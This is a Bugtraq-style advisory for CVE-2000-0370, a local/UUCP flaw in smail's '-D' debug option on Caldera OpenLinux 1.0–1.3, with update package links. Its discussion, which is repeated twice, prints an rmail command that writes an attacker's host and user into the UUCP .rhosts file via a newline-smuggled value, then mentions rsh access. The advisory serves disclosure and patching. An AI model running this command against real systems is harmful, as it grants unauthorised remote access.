Caldera OpenLinux 'smail -D' Command Vulnerability
BID:1268
Info
Caldera OpenLinux 'smail -D' Command Vulnerability
| Bugtraq ID: | 1268 |
| Class: | Access Validation Error |
| CVE: |
CVE-2000-0370 |
| Remote: | No |
| Local: | Yes |
| Published: | Jan 29 1999 12:00AM |
| Updated: | Jul 16 2007 09:36PM |
| Credit: | <unknown> |
| Vulnerable: |
Caldera OpenLinux 1.3 Caldera OpenLinux 1.2 Caldera OpenLinux 1.1 Caldera OpenLinux 1.0 |
| Not Vulnerable: | |
Discussion
Caldera OpenLinux 'smail -D' Command Vulnerability
According to the Caldera advisory (CSSA-1999:001.0), smail's -D option names the debug file to use. If an attacker submits a UUCP job containing the following rmail invocation:
rmail -N -D /usr/lib/uucp/.rhosts -oMs "joe\nhostname user\n" uucp
where '\n' is a newline, and 'hostname' and 'user' specify the attacking host and user, then 'smail' will happily append the following to the UUCP '.rhosts' file:
rmail: Debugging started: pid=25919
write_log:Received FROM:uucp HOST:joe
hostname user
PROGRAM:rmail SIZE:99
... some more lines ...
The attacker can then 'rsh' into the target host and try to exploit the UUCP account (e.g. by replacing the 'uux' binary).
Note that this hole is also exploitable locally; all you have to do is call 'uux rmail ....' to make it work.
According to the Caldera advisory (CSSA-1999:001.0), smail's -D option names the debug file to use. If an attacker submits a UUCP job containing the following rmail invocation:
rmail -N -D /usr/lib/uucp/.rhosts -oMs "joe\nhostname user\n" uucp
where '\n' is a newline, and 'hostname' and 'user' specify the attacking host and user, then 'smail' will happily append the following to the UUCP '.rhosts' file:
rmail: Debugging started: pid=25919
write_log:Received FROM:uucp HOST:joe
hostname user
PROGRAM:rmail SIZE:99
... some more lines ...
The attacker can then 'rsh' into the target host and try to exploit the UUCP account (e.g. by replacing the 'uux' binary).
Note that this hole is also exploitable locally; all you have to do is call 'uux rmail ....' to make it work.
Exploit / POC
Caldera OpenLinux 'smail -D' Command Vulnerability
Currently we are not aware of any working exploits for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: mailto:[email protected].
Currently we are not aware of any working exploits for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: mailto:[email protected].
Solution / Fix
Caldera OpenLinux 'smail -D' Command Vulnerability
Solution:
Update the smail package.
Caldera OpenLinux 1.0
Caldera OpenLinux 1.1
Caldera OpenLinux 1.2
Caldera OpenLinux 1.3
Solution:
Update the smail package.
Caldera OpenLinux 1.0
-
Caldera smail-3.2-5.i386.rpm
ftp://ftp.caldera.com/pub/OpenLinux/updates/1.3/019/RPMS/smail-3.2-5.i 386.rpm
Caldera OpenLinux 1.1
-
Caldera smail-3.2-5.i386.rpm
ftp://ftp.caldera.com/pub/OpenLinux/updates/1.3/019/RPMS/smail-3.2-5.i 386.rpm
Caldera OpenLinux 1.2
-
Caldera smail-3.2-5.i386.rpm
ftp://ftp.caldera.com/pub/OpenLinux/updates/1.3/019/RPMS/smail-3.2-5.i 386.rpm
Caldera OpenLinux 1.3
-
Caldera smail-3.2-5.i386.rpm
ftp://ftp.caldera.com/pub/OpenLinux/updates/1.3/019/RPMS/smail-3.2-5.i 386.rpm
References
Caldera OpenLinux 'smail -D' Command Vulnerability
References:
References: